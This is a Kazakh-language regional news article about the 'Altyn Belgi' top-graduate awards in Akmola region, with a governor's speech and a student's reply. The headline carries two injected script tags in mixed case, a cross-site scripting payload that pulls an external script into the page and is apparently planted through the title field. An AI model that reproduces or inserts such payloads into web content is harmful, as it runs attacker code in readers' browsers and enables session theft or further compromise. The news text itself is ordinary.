Ақмола облысында «Алтын белгі» иегерлері марапатталды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.06.2024

Бүгін Көкшетау қаласында 236 жас ақмолалықтар, «Алтын белгі» иегерлері құрметке ие болды. Айрықша белгіден басқа оларға салтанатты түрде 100 000 теңге сомасына ақшалай сертификаттар табыс етілді.

​Облыс әкімі Марат Ахметжанов түлектерді жетістіктерімен құттықтап, бүгінгі түлектер – Қазақстанның басты байлығы мен жарқын болашағы екенін атап өтті.

​«Мемлекет Басшысы Қасым-Жомарт Тоқаев «Аға буын жас ұрпаққа жол нұсқап, бағыт-бағдар беруі керек. Елімізде көзі ашық, көкірегі ояу, ойы ұшқыр, білімді жастар көп. Біз олардың бойына асыл қасиеттерді сіңіруіміз қажет». Бүгінгі таңда мемлекет өзін-өзі жүзеге асыру үшін және әрқайсыңыз алдыңызға қойылған мақсатқа жетіп, өз әлеуетіңізді толық ашуыңыз үшін барлық жағдайларды жасады. Өз күш-жігеріңіздің арқасында сіздер табысқа жету жолында алғашқы қадам жасадыңыздар, баға жетпес капиталға ие болдыңыздар – бұл өмір бойы тірек болатын білім мен дағдылар “, - деді М.Ахметжанов.

Абай атындағы №3 дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының түлегі Әмір Дәулетбаев түлектердің атынан жауап сөз сөйледі.​​​​​​«Біз түлектер ең алдымен ата-аналарымыз бен педагогтарымызға берген білімдері үшін алғыс айтамыз. Болашақта біз сіздердің сенімідерңізді ақтау үшін бар күшімізді саламыз және Отанымыздың дамуына өз үлесімізді қосамыз», - деді «Алтын белгі» иегері.

Айта кетейік, биыл орта мектепті 11-сыныптың 5000-ға жуық түлегі аяқтады, оның ішінде 236-сы «Алтын белгі» иегері және 347-сі жалпы орта білім туралы үздік аттестат иегері атанды.
Іс-шара облыстың оқу орындарының шығармашылық мамандықтары студенттері мен @bs_aqmola тәрбиеленушілерінің музыкалық нөмірлерімен жалғасты.

https://www.gov.kz/memleket/entities/aqmola-edu/press/news/details/792063?lang=kk 

Просмотров: 754


Пікір қосу



Деректерді қолтаңбаға қосу